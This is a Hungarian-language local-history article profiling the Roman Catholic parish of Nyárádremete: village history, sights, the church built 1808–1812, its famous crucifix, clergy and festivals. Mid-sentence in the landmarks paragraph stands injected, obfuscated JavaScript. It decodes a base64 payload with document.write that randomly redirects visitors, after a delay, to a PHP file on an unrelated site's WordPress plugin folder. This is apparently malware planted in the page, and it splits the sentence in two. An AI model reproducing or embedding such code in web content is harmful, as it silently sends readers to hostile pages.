A hét plébániája: NYÁRÁDREMETE

nyaradremete-romai-katolikus-templom.jpg

Nyárádremete Maros megyében, a Nagy-Nyárád völgyének legészakibb községe, egyúttal a Felső-Nyárádmente legnagyobb települése. Marosvásárhelytől 34 km-re északkeletre, a Vityal-pataknak a Nyárád folyóba ömlésénél fekszik, Szováta üdülővárostól 18 km, Szászrégentől pedig 25 km távolságra, a Bekecs hegy lábánál, a Mező-havas közelében. Nyárádremete a nyárádmenti Szentföldnek nevezett tájegység legnagyobb települése. A székelyhodosi útelegazástól számítják Szentföldnek a Szováta felé sorjázó falvakat, itt ugyanis nem hódított teret a protestantizmus oly mértékben, mint Hodostól lennebb, Nyárádszereda irányába. Sajátos ennek a tájegységnek az ünnepköre is, hisz itt a római katolikus egyház ünnepeit ülik meg a nyárádmenti székelyek. Neve először 1567-ben tűnik fel írásos forrásokban: Remete. Nyárádköszvényes filiája volt. A név a személynévként is használatos remete és a nyárfás vízfolyást jelentő Nyárád folyó nevének összetétele. Ez utóbbit 1907-ben tették hozzá megkülönböztetésül más Magyarországi Remete nevű településektől. A székelykapuk faragványainak szépsége és impozáns megjelenésük miatt igazi műremekeknek számítanak. Székelyföld kulturális örökségének részét képezik, hozzátartoznak a települések építészeti arculatához, népi építészeti együttesnek, épített örökségnek tekinthetők. 1910-ben 1943, túlnyomórészt magyar lakosa volt. Az 1719-es pestisnek a falu majd fele lakossága áldozatul esett. Az 1916-os román betöréskor határában magyar győzelmet hozó csata zajlott. A trianoni békeszerződésig Maros-Torda vármegye Nyárádszeredai járásához tartozott.

Gazdag látnivalók várják az erre járó turistákat-látogatókat, ilyenek: – a Bekecs hegy tetején található Bekecs várának, valamint egy kápolnának maradványai. A hegy oldalában első világháborús lövészárkok. A tetőhöz közel két első világháborús síremlék „hősök sírja”, elesett magyar katonák sírjai. – A mai temető helyén egykor kis kápolna állott. – A falu központjában, az út mellett áll az function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andezitből készült ezredévi emlékmű, amit 1896-ban, Magyarország ezeréves fennállásának emlékéül állítottak a helybeliek. - Millenniumi emlékoszlopát 1996-ban felújították. Ekkor került rá a fehér márványból készült magyar címer és egy „1100 éve itt vagyunk” feliratú márványtábla. – Az 1916-os román betörés emlékére a határban három emlékhelyet is építettek. - A falu központjából több turistajelzés is indul. Az így jelzett utakon eljuthatnak a Vityál-várhoz, a Bekecs-tetőre, Tompa-tetőre, a Mező-havasra.

1781-ben saját papot kértek, és meg is kapták. 1783-tól mint önálló plébánia szerepel. Ekkor kezdték tervezni a templom megépítését, a falu központjában. Egy 1760-ból származó feljegyzés szerint a falu határában már 1522-ben állt egy temetőkápolna. A mai templom 1808 és 1812 között épült,  Nyulas Ferenc orvos támogatásával, melynek szentélyében áll a szenvedő Jézust ábrázoló feszület, amely a 19. század elején épült templom fő ékessége. Sokáig úgy tartották, hogy a mestermű alkotója a késő gótika és a kora reneszánsz világhírű, Krakkóban és Nürnbergen dolgozó szobrásza, Veit Stoss. Valószínűbb azonban, hogy a feszület a neves mester Erdélyben letelepedett fiai – Johann és ifj. Veit Stoss – segesvári műhelyében készülhetett. Híres feszülete a marosvásárhelyi templomból került ide, amikor a hitújítók onnan kidobták, és a ferencesek őrizték Mikházán, majd Vármezőn, amíg a remetei templom felépült. A feszületet Apafi Mihály rendelte meg 1486-ban Weit Stosstól.  
1783-tól katolikus iskolája volt, melyet 1948-ban államosítottak. Vármezőn a 18. század elején br. Bornemissza József építtetett kápolnát, mely 1817-ben még állott. 1913-ban egy kis kápolnát építettek. A hagyomány pálosokról is tud, de róluk nincs okleveles adat. Valószínű, hogy a mikházi és köszvényesi ferencesek gondozták. Vármezőben a templom gróf Mailáth Gusztáv Károly püspöknek köszönhető, aki a templom építésének a felét állta, hogy 1911-ben elkészülhessen az ún. templomos iskola. A nyárádremetei Urunk mennybemenetele plébánia a Marosi főesperesi kerülethez tartozik. Jelenleg szolgálatot teljesít Köllő Gábor plébános és a kántori szolgálatot Balázs Csaba kántor tölti be. Egészen pontosan 2000-től vált szokássá, hogy minden év májusában falunapot szervezzenek, mely általában a templombúcsú után került megrendezésre. Idősek és fiatalok számára egyaránt érdekes kikapcsolódás, hiszen kultúrális és sportrendezvények mellett megannyi koncertet, bált is szerveznek. A húsvét utáni 40. napon ünnepli az Egyház, az V. század óta, Urunk mennybemenetelének napját és ekkor tartják Nyárádremetén a templom búcsuját, az idén május 30-án. Örökös szentségimádási nap: január 18.  

Összeállította: Gábor Anna.

Fotó: visitromania.info.ro

 

About the author

maradmin

Leave a Comment